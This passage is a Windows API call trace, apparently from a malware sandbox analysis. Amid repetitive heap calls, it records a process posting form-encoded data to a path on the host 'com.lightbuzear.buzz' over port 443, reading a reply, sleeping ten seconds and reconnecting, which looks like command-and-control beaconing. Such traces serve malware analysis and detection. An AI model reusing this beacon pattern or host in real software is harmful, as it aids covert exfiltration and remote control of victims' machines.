lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0297.987] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eaf8 [0297.987] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0297.988] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eea88 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0297.988] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0297.988] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480edc8 [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed80 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed80 | out: hHeap=0x4780000) returned 1 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0297.989] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0297.989] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0297.989] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4720 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eea60 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0297.990] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eea60 | out: hHeap=0x4780000) returned 1 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eece0 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0297.990] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef10 [0297.991] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0297.991] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0297.991] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0297.991] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0297.991] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef10 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4720 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4720 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eeab0 [0297.992] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0297.992] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0297.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeab0 | out: hHeap=0x4780000) returned 1 [0297.993] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeec0 [0297.993] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0297.993] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeab0 [0297.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0297.993] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0297.994] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0297.994] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0299.094] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeab0 | out: hHeap=0x4780000) returned 1 [0299.094] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0299.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0299.095] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0299.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0299.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0299.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0299.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0299.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0299.095] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0299.095] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eea60 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0299.096] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eea60 | out: hHeap=0x4780000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eead8 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0299.096] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eebc8 [0299.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0299.097] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0299.097] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0299.097] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0299.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eebc8 | out: hHeap=0x4780000) returned 1 [0299.098] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0299.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0299.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0299.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0299.098] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0299.098] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815638 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4888 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eed80 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0299.099] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed80 | out: hHeap=0x4780000) returned 1 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eea60 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0299.099] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef10 [0299.100] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0299.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0299.101] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0299.101] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0299.101] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef10 | out: hHeap=0x4780000) returned 1 [0299.101] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0299.102] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0299.102] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0299.102] FreeLibrary (hLibModule=0x71570000) returned 1 [0299.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0299.102] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0299.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eea88 | out: hHeap=0x4780000) returned 1 [0299.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0299.103] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0299.104] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0299.104] Sleep (dwMilliseconds=0x2710) [0299.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0299.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0299.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0299.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0299.129] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0299.129] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0299.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0299.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4888 [0299.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec78 [0299.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4888 | out: hHeap=0x4780000) returned 1 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0299.130] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ec78 [0299.130] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0299.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb00 | out: hHeap=0x4780000) returned 1 [0299.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0299.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb00 [0299.131] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0299.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0299.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0299.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0299.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0299.131] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed20 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480efa8 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eec68 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0299.132] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec68 | out: hHeap=0x4780000) returned 1 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eea88 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0299.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed58 [0299.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0299.133] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0299.133] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0299.133] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0299.133] FreeLibrary (hLibModule=0x71780000) returned 1 [0299.134] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed58 | out: hHeap=0x4780000) returned 1 [0299.134] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0299.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eee98 [0299.134] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0299.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0299.134] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed20 [0299.135] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0299.135] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0299.151] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed20 | out: hHeap=0x4780000) returned 1 [0299.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed20 [0299.151] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eeb50 [0299.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eeb50 | out: hHeap=0x4780000) returned 1 [0299.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0299.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed58 [0299.152] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0299.153] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f200 [0299.153] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 